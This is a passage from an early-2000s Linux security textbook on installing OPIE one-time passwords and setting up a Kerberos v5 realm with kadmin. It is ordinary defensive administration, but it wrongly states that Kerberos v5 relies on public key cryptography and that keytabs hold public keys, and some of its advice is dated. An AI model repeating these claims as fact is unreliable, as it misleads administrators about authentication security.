OTP support in your +Linux systems is to install the OPIE.For you Andy Griffith fans,OPIE doesn’t +refer to Ronnie Howard’s character.It stands for “one-time passwords in every- +thing.”It’s not a perfect acronym,but as far as OTP is concerned,OPIE is just +about as perfect as you can get.OPIE is based on another,older OTP application +named S/Key.What makes OPIE different is that it supports the Message Digest +5 (MD5) algorithm,which has become a de facto standard. +What Files Does OPIE Replace? +Once installed,OPIE automatically secures the use of the substitute user (su) +application,as well as securing Telnet-based login.In order to do this,OPIE +automatically replaces the following applications: +(cid:2) /bin/su +(cid:2) /bin/login +By default,OPIE does not enforce OTP whenever you log in interactively. +Any user is given the choice of using OTP or the standard login procedure.This +is necessary,because the creators of OPIE realized that too many people were +locking themselves out of their own systems.Thus,OPIE is not an ideal solution +for securing interactive login.However,any Telnet-based connections that come +from a remote host will be required to log in using OTP. +OPIE does not currently support OTP for X Window sessions.Therefore,if +you allow users to connect to your server through X,you must consider an alter- +nate way to secure these connections (such as SSH or IPSec). +How Does OPIE Work? +OPIE works by generating a list of passwords that can (you guessed it!) be used +only once.After a user logs in remotely,OPIE will issue a challenge.This chal- +lenge will always contain two elements: +(cid:2) Sequence number A number that begins by default at 499.Each time +a user logs in,the count will decrement by one.After the count reaches +0,the systems administrator will have to regenerate the password infor- +mation using opiepasswd. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 306 +306 Chapter 6 • Network Authentication and Encryption +(cid:2) Seed number A fixed number for each account.Each account gets a +completely random number. +After a user enters his name at a remote server’s login prompt,OPIE will +send these two values over the network to the client’s terminal.The user will +then enter these two numbers into an OTP generating program,such as +opiepasswd (for Linux systems) or WinKey (for Windows 9x,Me,and 2000 +systems). +OPIE will issue a challenge in the following situations: +(cid:2) Using Telnet The login program ensures that Telnet users are always +challenged. +(cid:2) Using su Any nonroot user who uses su will always be challenged. +(cid:2) Using FTP If configured,OPIE supports FTP as well. +OPIE Files and Applications +Here is a list of the files that the systems administrator will use: +(cid:2) /usr/local/bin/opiepasswd Used by the administrator to generate +passwords for all users. +(cid:2) /etc/opiekeys Contains the usernames and values used for the server’s +request.The additional information is a hash value of the secret password +and the date the password was created.It is vital that you secure this file +from all users. +(cid:2) /etc/opielocks/ Contains entries of the users who are locked out. +(cid:2) */opieftpd Allows you to use OTP via FTP,and it is meant as a +replacement for the in.ftpd daemon.The asterisk represents the OPIE +source code directory,which will vary.You will learn more about +opieftpd shortly. +(cid:2) /etc/opieaccess Allows the systems administrator to specify certain +hosts that do not have to use OTP.This,of course,means that usernames +and passwords will traverse the network. +Users can use the following applications to generate responses: +(cid:2) /usr/local/bin/opiekey A command-line Linux utility.For security +reasons,OPIE will not allow users to execute this application remotely. +Otherwise,passwords will traverse the network. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 307 +Network Authentication and Encryption • Chapter 6 307 +(cid:2) /usr/local/bin/opieinfo A command-line Linux utility that informs +users concerning the next sequence number and seed number they will +use.As with opiekey,this application will not allow users to execute this +application remotely. +(cid:2) opie.tk An X Window application written in tcl/tk that does the same +thing as opiekey. +(cid:2) WinKey A Windows 2000/NT/Me/9x utility that does the same thing +as opiekey. +Generally,using these applications requires the use of two terminals or win- +dows:one to begin the actual login session and the second to generate the +response.Although safeguards are built into these applications,it is vital that you +do not first establish an insecure connection,then use these applications. +SECURITY ALERT! +If you install OPIE and then do not run opiepasswd -c on each user, +these users will not be able to log into your system remotely. You must +use this command on the root account, as well. Otherwise, you will only +be able to log in to your system interactively. If you try to log in +remotely, all accounts will be forced to use OTP. Because you have not +yet generated a password list, your OTP implementation will forever +forbid you from remotely accessing the system. +opiepasswd +Although several options exist when using the opiepasswd command,the +following is the most important: +opiepasswd -c username +Any user that you add must already belong to the /etc/passwd and +/etc/shadow database.The opiepasswd command allows you to create OTP +password lists for each user you specify.The -c option allows the systems adminis- +trator (root) to simply enter the root password,as opposed to entering an OTP +password.Then,opiepasswd will generate a key for each user.This process +involves selecting a private key for each user.Consider using passwords of at least +ten characters,although OPIE will use any length.After you have added the user, +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 308 +308 Chapter 6 • Network Authentication and Encryption +OPIE will report information about the user.Those who are truly meticulous +will write this key down for each user and store it in a safe place.You will have to +use this command against every single user in your system,including the root +user. +When the count for a specific user reaches 0,you will have to run +opiepasswd -c again on the account.Without the -c option,you will have to +first use opiekey to generate a password,then enter the response when adding +any user.For more information,consult the opiepasswd man page. +SECURITY ALERT! +Do not use the -c option remotely, because using it requires passwords +to traverse the network. If you must use opiepasswd over a network, +simply use the opiepasswd command. For example, if, as root, you want +to change a password for the user named james, you would issue the +following command: +opiepasswd james +However, you will have to train your users to never attempt this com- +mand while they are using a remote connection. The opiepasswd com- +mand will not allow it. Still, naïve users may still try to enter passwords. +This results in passwords crossing the network, which can erode your +network’s security. +As soon as the opiepasswd command is used against a user,it is then possible +for that user to use OTP to log in.However,make sure that you give all users +their first passwords,as well as their secret passphrases.If you do not do this,users +will not be able to use OPIE.In fact,it is wise to give users at least a small list of +passwords so that they can get used to the concept. +Password Format +Each password that is generated will appear similar to the following: +KING MORT GEM WASH STAR SING +Although this text string appears to be six passwords,it is only one.Inform +your users that they should enter these passwords in all caps,just to be consistent. +Figure 6.3 shows the addition of a user named opieuser. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 309 +Network Authentication and Encryption • Chapter 6 309 +Figure 6.3 Using opiepasswd to Add a User +Using opiekey +Any user who receives a request will have to generate a response.The opiekey +command generates responses.Users will have to find a way to transfer the +server’s challenge into the opiekey command line.Figure 6.4 shows a use of +opiekey where the challenge of 498 ke3468 has been entered.Opiekey then +requires that you enter your secret passphrase,which the administrator must give +to the user in a secure manner.The user must exercise extreme caution with this +secret key,because if it is made public,anyone with an OTP application could log +on to the server. +Figure 6.4 Using opiekey to Compute a Response +It is vital that you explain to all OPIE users that they cannot reveal their +secret keys.If a user reveals his key,then the systems administrator will have to +re-create the user’s OTP list using a different secret key. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 310 +310 Chapter 6 • Network Authentication and Encryption +Using opieinfo and opiekey to Generate a List +When the systems administrator creates an OTP password list,the user can use +the opieinfo command to generate a list of passwords for later use.This way,a +user can still log in to a system if an OTP calculator is not available.The fol- +lowing command creates a list of the next five passwords and stores it into a file +named opiejames.txt: +opiekey -n 5 ‘opieinfo‘ > opiejames.txt +opiekey –n 5 496 ke 7116 +492: AGEE NU ORR MIT SALE BOW +493: FUSS SONG MAIL STUB SOIL WARM +494: TENT SMUG JOT WEAN CLAW BIRD +495: BANG SAD OF TORE TALL DUNE +496: ROW PO SPA HEFT CUE QUIT +This command works because it first has opiekey use the opieinfo com- +mand to learn about the current sequence and seed number for the user,then +print out the next five passwords.You can then e-mail this list to the user,who +can then print it out and use it at any terminal.All the user has to do is pay +attention to the sequence number given by the server,then enter his secret key +and the password.It is really not a problem if a user loses this list,as long as the +user does not reveal her secret key. +Installing OPIE +If you are using a mainstream system,such as Red Hat or SuSE,the installation +process is simplicity itself.You just do the following in the source directory: +./configure +make +make install +Configuration Options +The configure script has several different options,although most people will +not find them necessary.You can read about them all by issuing the ./configure +--help command.Table 6.1 provides a list of the more important options. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 311 +Network Authentication and Encryption • Chapter 6 311 +Table 6.1 Configuration Options for OPIE +Option Description +--enable-access-file=FILENAME Allows you to create a file that allows +hosts to bypass OTP. This file is not +installed or supported by default, because +it can defeat the purpose of installing +OPIE in the first place. Although not +necessarily a security hole, this option can +cause problems, because once again, +passwords will begin to pass over the +network. +--bindir=DIR This option allows you to determine +where the OPIE binaries will be placed, if +you do not want them in the /bin/ +directory. +--disable-user-locking By default, users will be kicked out after a +number of failed logins unless you specify +this feature. +--enable-user-locking[=DIR] Allows you to specify the location of the +user locking directory. +--enable-retype Allows users to retype their secret pass +phrases if they make a mistake. +--enable-insecure-override Allows the use of opiepasswd and +opiekey over a network. As with the +--enable-access option, this option can +cause security problems. +Installation Options +It is also possible to install only the OPIE clients.This option is useful,because +you may want to disable all login options for a particular client system but still +allow this system to log in to remote servers.If you wish to install only the client, +you can issue the following command after issuing the ./configure command, +complete with any options you desire: +make client install +This option installs only opiekey and opieinfo.Or,if you wish to install +only the server,you can issue the following command: +make server-install +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 312 +312 Chapter 6 • Network Authentication and Encryption +You can learn more about configuration features by reading the README +and INSTALL files that come with the distribution. +NOTE +The opiekey command requires a seed value that is over five digits. If +the opiepasswd -c command generates a value that is too short, +opiekey will fail. This often happens after you reinstall OPIE. If you +encounter this problem, edit the /etc/opiekeys file and erase the entry of +the account having this trouble. +Uninstalling OPIE +Upon installation,OPIE copies the existing /bin/su and /bin/login files +su.opie.old and login.opie.old.After installing OPIE,you can use the make +uninstall command to return the system back to its original state.The OTP ver- +sions of su and login will be removed and replaced with the original versions. +However,the make uninstall command will work only if the installation went +well and if you are in the original directory from which you compiled OPIE.This +means that you will have to keep the original installation directory handy in case a +problem appears.Relying completely upon an uninstallation program to do the +right thing every time is usually unwise,so remember the exact permissions of the +original files.In Red Hat Linux,these permissions are as follows: +(cid:2) /bin/su:-rwsr-xr-x +(cid:2) /bin/login:-rwsr-xr-x +Exercise: Installing OPIE +1. Create a subdirectory off of your home directory named opie. +2. Using a Web browser,download the OPIE 2.4 tarball source code from +the CD accompanying this book,or from www.inner.net/opie. +3. After you have obtained the file,place it in the opie directory. +4. Issue the following command: +tar -zxv +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 313 +Network Authentication and Encryption • Chapter 6 313 +5. Change to the source directory (it should be named opie-2.4). +6. Issue the following commands,in order: +./configure +make +make install +You can tell that things are going well when the ./configure script +finishes in a way similar to that shown in Figure 6.5. +Figure 6.5 Installing OPIE +7. After running make install,immediately issue the following command: +/usr/local/bin/opiepasswd-c root +Now,follow the instructions given by the opiepasswd command. +8. When opiepasswd completes,write down the resulting sequence +number,seed number,and password here: +____________________________________ +____________________________________ +____________________________________ +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 314 +314 Chapter 6 • Network Authentication and Encryption +9. After you have added root,you can now access this account from a +remote server by using Telnet.But first,create two new users using the +useradd and passwd commands: +opieuser1 +opieuser2 +Make sure that you use the passwd command to give these users +standard passwords in the /etc/shadow directory. +10. Issue the following commands: +/usr/local/bin/opiepasswd-c opieuser1 +/usr/local/bin/opiepasswd-c opieuser2 +11. Now,issue the following command to generate OTP lists for root, +opieuser1,and opieuser2: +opiekey -n 5 `opieinfo` > otplistroot.txt +opiekey -n 5 `opieinfo opieuser1` > otplistopieuser1.txt +opiekey -n 5 `opieinfo opieuser2` > otplistopieuser2.txt +12. You now have a list of the next five challenges OPIE will issue for all of +the users you have added,in case they (and you) can’t get to an OTP +generator such as opiekey or WinKey.Test your OPIE installation +locally.Open another terminal and log in as a normal user.If you are +running X,just open another terminal screen and use su to become a +nonroot user (if you have a nonroot account named james,use the com- +mand su james).If you are at the command line,press CTRL+ALT+F2, +or CTRL+ALT+F3,then log in as the nonroot user. +13. Now,as a nonroot user in a new terminal,use the su command: +su +14. Notice that instead of the standard password,you are now given a chal- +lenge from OPIE. +15. To create a response,get to any terminal and use the opiekey command +as shown earlier in this chapter.That is,enter the following information, +substituting the sequence and seed numbers,as shown: +opiekey sequence# seed# +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 315 +Network Authentication and Encryption • Chapter 6 315 +16. The opiekey command will respond by asking you your secret pass- +word.Enter this password correctly,because opiekey will use this secret +password with the sequence and seed values to calculate the correct +password.Remember,the sequence key will look something like “495,” +and the seed value will look something like “bl13468.”Enter nothing +else. +17. When you enter the correct sequence and seed numbers,opiekey will +respond with a password consisting of several uppercase words.Go back +to the terminal and carefully enter this password in all capital letters into +the Response section in the other terminal,and you will be logged in. +Congratulations.You have installed OPIE on your Linux system.Now,you +can install the client portion on a remote server and test your work.See the next +exercise for details. +Exercise: Installing the OPIE +Client on a Remote Server +1. On another host than the one you used in the previous exercise,create a +subdirectory named opie.This host will be called the OPIE client. +2. Change to the opie subdirectory and obtain the OPIE tarball. +3. Run the following commands: +./configure +make +make client install +4. Telnet to access the original server that has the full OPIE installation. +This server will be called the OPIE server.The copy of OPIE on this +server will issue you a challenge (the sequence number and the seed +number). +5. Now,open another terminal on the OPIE client and run opiekey. +Enter the challenge and seed numbers to log in.If you have any +questions,follow the instructions given earlier in this chapter. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 316 +316 Chapter 6 • Network Authentication and Encryption +Exercise: Using opie-tk and Allowing +Windows Users to Deploy OPIE +1. It is very likely that you work with users who use the X Window envi- +ronment,as well as Microsoft Windows systems.Several OTP generators +exist that run right from any modern Windows systems.You can even +find clients that run in DOS and Windows 3.11,if you want.Linux +GUI clients exist,as well.Download the following files from +www.inner.net/opie: +(cid:2) winkey.exe A self-executable zip file,which contains the WinKey +application for Windows 2000,NT,9x, and Me.This file is available +on the CD that accompanies this book. +(cid:2) opie.tk-v2.3.gz A tarball containing the opie.tk GUI for Linux. +This file is also available on the accompanying CD. +If you wish,you can also download additional clients,such as those +for Macintosh or HP-UX machines. +2. First,let’s start with using the opie.tk application.Unzip the application, +then run it as follows: +./opie.tk-v2.3 +3. Begin a telnet session with the OPIE server and enter a login name so +that you receive a challenge. +4. Enter this challenge into the opie.tk-v2.3 screen and press Calculate. +You will see a response similar to that shown in Figure 6.6. +Figure 6.6 The opie.tk Interface after Calculating a Response +5. Enter this response into the Telnet terminal and log in. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 317 +Network Authentication and Encryption • Chapter 6 317 +6. Now,unzip the WinKey binary,which is in a self-executing file. +7. Repeat the OPIE login procedure.See Figure 6.7,which shows a user +receiving a challenge. +Figure 6.7 Logging On to a Linux System from Windows 2000 +Advanced Server +8. Enter the challenge values into the WinKey client and press Compute. +You can copy and paste these values,if you wish.You will receive a +response similar to that shown in Figure 6.8. +Figure 6.8 Using WinKey to Generate a Response +9. Now,enter the response into the client.Sometimes,the Windows screen +will allow you to paste the response right into the proper place.Just right- +click on the screen.If this doesn’t work,just enter the values manually. +10. When you enter the response properly,you will be logged in. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 318 +318 Chapter 6 • Network Authentication and Encryption +Exercise: Installing opieftpd +1. OPIE does not automatically place the compiled opieftpd file into a +standard directory,nor does it program xinetd to recognize and use the +binary.The compiled binary will be found in the OPIE source code +directory of the OPIE server.Copy this file to the /usr/sbin/ directory. +2. Now,create a simple text file named opieftpd in the /etc/xinetd.d/ direc- +tory and enter the following into it: +service ftp +{ +disable = no +socket_type = stream +wait = no +user = root +server = /usr/sbin/opieftpd +server_args = -l +log_on_success += DURATION USERID +log_on_failure += USERID +nice = 10 +} +3. Now,disable the wu-ftpd daemon by editing its file (it should be in the +/etc/xinetd.d/ directory) and change the disable = value to yes.If you +have another FTP daemon configured to run from xinetd or any other +daemon,disable it now. +4. Restart xinetd: +/etc/rc.d/init.d/xinetd restart +5. Now,FTP to the OPIE server and enter your name to begin the OPIE +login sequence.If you don’t see an OTP challenge,then recheck your +work. +6. Use any OTP client you wish to generate a response.Make sure that +you enter your secret key (password) and sequence/seed numbers +accurately. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 319 +Network Authentication and Encryption • Chapter 6 319 +7. The text you copy in from WinKey,for example,will not echo.Trust +that it has been entered and press ENTER.You may have to repeat this +process a few times in order to get it correct. +8. When you enter the information correctly,you will be logged in.You +now have enabled OTP support for the su command,as well as for +Telnet and FTP. +Implementing Kerberos Version 5 +Kerberos has become the premier way to allow network authentication.It pro- +vides a central login point for a network that allows single sign-on for the net- +work resources the user is allowed to access.Kerberos v5 is a revolutionary step +in network authentication,because it allows you to establish a domain that +authenticates not only individual hosts and users,but individual daemons,as well. +Using Kerberos,it is possible to centrally control which hosts and users can access +the daemons on your network.In this sense,Kerberos is revolutionary.It obviates +the use of the Network Information Service (NIS),for example,and is a vast +improvement upon it.Both NIS and Kerberos allow you to centrally manage +users,but NIS does not encrypt transmissions,and it requires passwords to be +given across the network.Microsoft now uses its proprietary version of Kerberos +for its Windows 2000 products. +After Kerberos is established on a network,passwords do not ever cross the +network,not even in encrypted form.It is also possible to configure Kerberos to +encrypt,ensuring communications between authenticated hosts.Kerberos is +implemented by a Key Distribution Center (KDC),which holds all of the infor- +mation that allows Kerberos clients to authenticate;the KDC contains the +database that makes single sign-on possible.Whenever you have a system of +Kerberos clients authenticating with a KDC,you are said to have a Kerberos +“realm,”which is shown in Figure 6.9. +Whenever you have a host that joins a Kerberos realm,it is often said to be +“Kerberized.”Whenever an application is altered to participate in a Kerberos +realm,it is also said to be Kerberized.This chapter discusses Kerberos version 5, +which is the most current version as of this writing. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 320 +320 Chapter 6 • Network Authentication and Encryption +Figure 6.9 A Kerberos Realm +Key Distribution Center (KDC) +Kerberos Host A +Kerberos Host B +Kerberos Realm +Kerberos Host C Kerberos Host D +NOTE +Usually, a Kerberos realm is given the same name as the Domain Name +System (DNS) name for the company. Thus, a company with the DNS +name of yourcompany.com will likely have the Kerberos realm name of +YOURCOMPANY.COM. This practice is not absolutely necessary, however. +You will see how you can edit a portion of the /etc/krb5.conf file to map +dissimilar DNS domain and realm names to each other later in this +chapter. +Why Is Kerberos Such a Big Deal? +The KDC’s database does not work in the traditional way.Traditionally,a standard +user database waited for passwords to be sent across the network,and then the +authentication mechanisms would present authentication information (a user- +name and a password) to the database,make a comparison,and then access would +be granted.In Kerberos,all network information (data about users,services,and +hosts) is stored in the Kerberos database.This database contains the public keys of +all principals.A principal is the name for any host,service,or user that is allowed +to authenticate on a Kerberos network.Any sensitive information,such as pass- +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 321 +Network Authentication and Encryption • Chapter 6 321 +words,always stays on the KDC and on the client.Using public key cryptog- +raphy,the KDC and the client establish trust relationships that allow the KDC to +then determine exactly which services a host and/or user can access. +Kerberos Terms +Table 6.2 provides the terms used when implementing Kerberos. +Table 6.2 Common Kerberos Terms +Kerberos Element Description +Key Distribution Center (KDC) The system that authenticates principals. The +KDC is responsible for the storage and +transmission of principals on a Kerberized +network. Most of the time, the KDC houses +the Ticket Granting Server (TGS). The TGS +provides a special token called a ticket +granting ticket. The KDC also houses the +Authentication Server (AS), which grants the +actual tickets clients use when accessing +hosts and daemons. +Client A host that is part of a Kerberos realm. A +client can house several daemons that can +be accessed only if a user has properly +authenticated with a KDC. +Ticket Granting Ticket (TGT) A special access token obtained from the +KDC that enables users to obtain additional +tickets. Every user on a Kerberos realm must +use the kinit program to obtain a TGT. +Authentication Server A server that is responsible for granting +tickets to users, hosts, and host daemons +(principals). The Authentication Server first +communicates with the TGT to ensure that +the principal has been authenticated, and it +then issues the ticket. In Linux systems, the +Authentication Server is housed in the same +system as the KDC. +Ticket Temporary credentials generated when a +properly authenticated client accesses +network service, such as an FTP server, a +printer, or a router. The ticket authenticates a +client that wishes to use a remote service in +a realm. If a client (Host A) wishes to access +Continued +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 322 +322 Chapter 6 • Network Authentication and Encryption +Table 6.2 Continued +Kerberos Element Description +a host in a Kerberos realm (Host B), the KDC +will issue a ticket to Host A, which allows +access to the service for a certain period of +time (hours, by default). A ticket is not +generated by kinit. +Principal The equivalent of an entry in the /etc/passwd +and /etc/shadow database in a standard +Linux system. A principal can be defined as +either a user, a host, or a host daemon that +runs on hosts, and is comprised of three +parts: The primary, the instance, and the +realm. See Figure 6.10. +Credential cache/ticket file Usually a file in the /tmp/ directory that +contains your TGT, host, and host daemon +keys. Service keys are generated when a +client attaches to a Kerberized daemon that +is able to authenticate with the KDC. +Keytab (Key table) A file on a Kerberos client that includes the +public keys of the hosts and host daemons +that this server can access. Whenever a +connection is made, Kerberos checks the +contents of the keytab, then checks the +current user’s credential cache. If these +elements are approved, Kerberos will allow +access to the remote server. It is vital that +you update this file on each client. The file is +usually named /etc/krb5.keytab. +Policy A special limit placed upon a Kerberos +principal that determines the amount of time +a particular user, host, or host daemon ticket +remains valid. +Kerberos Principals +You have already read that a principal consists of a primary (also known as a +“root”),an instance,and a realm.Figure 6.10 shows an example of a host prin- +cipal,which uses all of the three elements of a principal.A host principal always +has the word “host”as the primary,then has the name of the host as the instance +and the realm name in the realm section.A principal can exist for daemons run +by hosts,as well. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 323 +Network Authentication and Encryption • Chapter 6 323 +Figure 6.10 A Kerberos Principal +Principal +Primary Instance Realm +Host /www.yourcompany.com @YOURCOMPANY.COM +The following is an example of a host daemon principal: +ftp/www.yourcompany.com@YOURCOMPANY.COM +This principal recognizes the FTP service for the www.yourcompany.com +service.Any user who properly authenticates with the KDC and who is +allowed access to this service will then be able to use the FTP service on the +www.yourcompany.com host. +Many times,however,a principal does not have an instance.For example, +it is possible to create a user principal,which would appear as follows: +james@YOURCOMPANY.COM.This principal would allow a user to log +on to any host in a Kerberos realm.You can,of course,specify an instance for a +user.For example,the following principal would allow login to only the +system named www.yourcompany.com:james/www.yourcompany.com +@YOURCOMPANY.COM +The Kerberos Authentication Process +The information in the next couple of paragraphs is greatly simplified,but it is +more than enough from a system administrator’s point of view.When a Kerberos +client first obtains a TGT from the KDC,this token does not actually provide +access to any particular daemon or network service.It is simply a token that +informs other hosts that the KDC has authenticated this host,and that this host +and user can request services from other hosts.Because the TGT is signed by the +user’s password and turned into a hash,the user can use the kinit command and +his own password to generate the same hash and make a comparison between +the two.If the TGT and password match,then a session key is established and a +credential cache is created,usually in a file in the /tmp/ directory. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 324 +324 Chapter 6 • Network Authentication and Encryption +After the credential cache file is populated with the TGT,the host and user +can then use this TGT to actually log on to hosts and request services.When it +comes time for a user (a principal) to access a host’s daemon (such as Kerberos- +FTP and rlogin),the user uses his TGT to contact the KDC and ask for an actual +ticket,which is the access token for a specific service.If the KDC authenticates +this request,the KDC will send a ticket and update the principal’s credential +cache with information about the service he or she has requested.If the Kerberos +database does not contain the service or host name,then access will be denied. +How Information Traverses the Network +When a ticket is transported across the network,it is signed by the user’s pass- +word,which is entered whenever a Kerberos administrator uses the kadmin pro- +gram to add a principal to the database.Note that the ticket does not actually +contain the password.It is only signed by a password,which creates a hash.Not +only that,but Kerberos places a time stamp on this ticket,so that even if someone +with a supercomputer were to subject this ticket to a brute force attack and then +generate a valid hash,the access token would no longer be valid.The Kerberos +version in Red Hat Linux defaults to 8 hours.For this reason,time synchroniza- +tion on networks and systems that use Kerberos is essential.NTP (Network Time +Protocol) may be used for this purpose. +NOTE +For a more exhaustive discussion detailing how Kerberos works, go to +http://web.mit.edu/kerberos/www/dialogue.html. This URL will take you +to a document entitled “Designing an Authentication System: A Dialogue +in Four Scenes.” Not only does it explain Kerberos quite well, it is also a +well-written parody of a dialogue using the Socratic Method. I know that +the document sounds pretty stuffy, but it’s an easy read and will help +you learn more about exactly why Kerberos was developed and exactly +what it does. +However, understand that this document was originally written for +Kerberos version 4. The current version of Kerberos is version 5. The chief +alterations between Kerberos v4 and Kerberos v5 is that Kerberos v5 uses +public key encryption. So, as clearly written as the dialog is, if you don’t +understand public key cryptography well, then you probably won’t +understand Kerberos very well. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 325 +Network Authentication and Encryption • Chapter 6 325 +Creating the Kerberos Database +After installing Kerberos,you will have to create a database where all principals +will be stored.You do this by issuing the following command: +/usr/kerberos/sbin/kdb5_util create -s +This command creates the necessary database files in the /var/kerberos/ +krb5kdc/ directory.After you have created the database entries,you then edit the +/etc/krb5.conf and /var/kerberos/krb5kdc/kdc.acl files to reflect your Kerberos +realm and DNS domain names.You must then add an administrative user,as well +as additional principals,to the database. +Using kadmin.local +Because you have a new Kerberos realm,you are presented with a logical conun- +drum:You need to administer Kerberos,but the kadmin command requires that +you present a username and a password.However,no administrative user or pass- +word exists in the database yet.So,how do you get started? The answer is the +/usr/kerberos/sbin/kadmin.local command.It does not require a user to first +authenticate.As long as you have created the Kerberos database and edited the +proper files,you will then be able to use kadmin.local to add an administrative +user: +/usr/kerberos/sbin/kadmin.local –q "addprinc james/admin" +This command has kadmin.local run as a one-time command.You can also +use kadmin.local interactively,which means that you begin a session where you +get a special prompt that lets you enter Kerberos-specific commands.You can +learn more about kadmin.local by reading its man page. +After using kadmin.local,Kerberos will have an administrative user,and you +can use the kadmin from any host on the network. +SECURITY ALERT! +Because kadmin.local does not require extensive authentication, con- +sider the importance of making sure that this system runs no other dae- +mons, and is accessible only via the most stringent security requirements. +For example, consider allowing only interactive login and making sure +that the computer itself is physically secure. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 326 +326 Chapter 6 • Network Authentication and Encryption +Using kadmin +The kadmin application,also found in the /usr/kerberos/sbin/ directory,is +designed to add principals to the Kerberos database.It is much like +kadmin.local,except you can issue it from any Kerberos client on your realm. +Kadmin is usually used as an interactive command,as shown in the following +sequence: +terminal# kadmin +Authenticating as principal james/admin@ YOURNETWORK.COM with password. +Enter password: +kadmin: addprinc james +WARNING: no policy specified for james@ YOURNETWORK.COM; defaulting to +no policy +Principal "james@YOURNETWORK.COM" created. +kadmin: quit +terminal# +This example shows a kadmin session where the Kerberos administrator, +james/admin,starts kadmin,enters the administrative password,then uses the +addprinc command to add a user named james.This user will then be able +to access network daemons and services,as long as the Kerberos administrator +takes the additional steps shown in the upcoming example.Notice first that +Kerberos automatically adds the realm name.Second,notice that the user +james@yournetwork.com is different than the user james/admin@yournetwork +.com.This is because the first principal (james@yournetwork.com) has an empty +instance,whereas the second (james/admin@yournetwork.com),lists the admin +instance,which makes the user an administrative user. +Here is another example: +terminal# kadmin +Authenticating as principal root/admin@STANGERNET.COM with password. +Enter password: +kadmin: addprinc -randkey host/www.yournetwork.com +WARNING: no policy specified for host/www.yournetwork.com@ +YOURNETWORK.COM; defaulting to no policy +Principal "host/www.yournetwork.com@YOURNETWORK.COM" created. +kadmin: quit +terminal# +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 327 +Network Authentication and Encryption • Chapter 6 327 +This example shows a kadmin session where the Kerberos administrator +james/admin starts kadmin,enters the administrative password,then uses the +addprinc -randkey command to add a host principal named host/www. +yournetwork.com.The -randkey option is unique to host and host daemon princi- +pals,because after a principal is created,the password no longer needs to be +remembered,because this password will be used to sign tickets for users who are +already authenticated.This password is used only to sign tickets.No user will ever +have to enter this password.In this case,it is best to let Kerberos create its own +difficult password,rather than you taking the time to do so,because you will then +have to verify it. +To add a host daemon,you would simply issue the following command from +within kadmin: +addprinc -randkey ftp/www.yournetwork.com +This command adds the ftp daemon for the www.yournetwork.com daemon. +NOTE +For the sake of convenience, you may want to make your administrative +user the same name as your login name. Although not the most secure +option, doing so means that you don’t have to use the following com- +mand each time you start kadmin: +/usr/kerberos/sbin/kadmin –p james/admin +Still, it’s important that you know this command, because you will +need to use it at least once on every host that belongs to your Kerberos +network. This is because, as you will see, each client needs to have its +keytab file updated by the systems administrator. +Finally, if you are logged into one Kerberos realm named +@othercompany.com, and you wish to use Kerberos to log into +@yourcompany.com realm, you can issue the following command: +/usr/kerberos/sbin/kadmin –p james/admin@YOURCOMPANY.COM +This command will also work if you are logging in from the +@yourcompany.com realm. Adding the @yourcompany.com is simply +redundant in this case, however. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 328 +328 Chapter 6 • Network Authentication and Encryption +The kadmin command also lists,modifies,and deletes principals.To list pres- +ent Kerberos users from within kadmin,enter the following command: +kadmin:list_principals +ftp/blake.yourcompany.com.YOURCOMPANY.COM +rlogin/wordsworth.YOURCOMPANY.COM +james.YOURCOMPANY.COM +sandi.YOURCOMPANY.COM +host/blake.yourcompany.com.YOURCOMPANY.COM +kadmin: +To delete any principal,you can issue the following command: +kadmin: delete_principal user1 +Are you sure you want to delete the principal "user1@YOURCOMPANY.COM"? +(yes/no): yes +Principal "user1@YOURCOMPANY.COM" deleted. +Make sure that you have removed this principal from all ACL's before +reusing. +kadmin: +For more information,use the ? command from within kadmin or consult +the Kerberos documentation in the /usr/share/krb5*/ directory and the man +pages.The asterisk represents the Kerberos version you are using. +Using kadmin on the Client +The kadmin command does not simply add and manage principals to the +Kerberos realm.It is also used to populate and update the Key table files for each +Kerberos host.It is vital that you understand this kadmin function,because most +of the existing Kerberos documentation skims over this step.This is partially +because most people who write about Kerberos do not have the knowledge to +actually implement Kerberos,or because they know how to implement Kerberos +so well that they just assume that you already know this step.Hopefully,the pres- +ent discussion will bridge the gap between the overly theoretical and overly tech- +nical writers and actually show you how to properly configure Kerberos clients. +You will learn more about this shortly.Figure 6.11 shows the gkadmin interface. +Although it is a nice interface,the command-line interface is ideal for +updating the /etc/krb5.keytab files on clients. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 329 +Network Authentication and Encryption • Chapter 6 329 +Figure 6.11 The gkadmin Interface +NOTE +If you are running X, you can use the gkadmin GUI utility. Install the +gnome-kerberos package for your particular distribution. You can obtain +it from www.rpmfind.net, or other sites. It is also available on many +distribution CDs, such as the Red Hat Power Tools disk. +Using kadmin and Creating +Kerberos Client Passwords +As a Kerberos administrator,you will have to add user principals.The creators of +Kerberos (researchers at the Massachusetts Institute of Technology) have recom- +mended client passwords of at least six characters.Passwords should combine upper- +and lower-case letters,and they should also include numbers and punctuation +marks. +www.syngress.com + +138_linux_06 6/20/01 9:43 AM Page 330 +330 Chapter 6 • Network Authentication and Encryption +Setting Policies +Kerberos policies are much like standard Unix password policies.They determine +password length,whether or not a user’s principal will expire at a certain time, +when the password will expire,and so forth.Standard principal policy settings +include the following: +(cid:2) Policy name When you create a policy,you can name it to help differ- +entiate it from other policies. 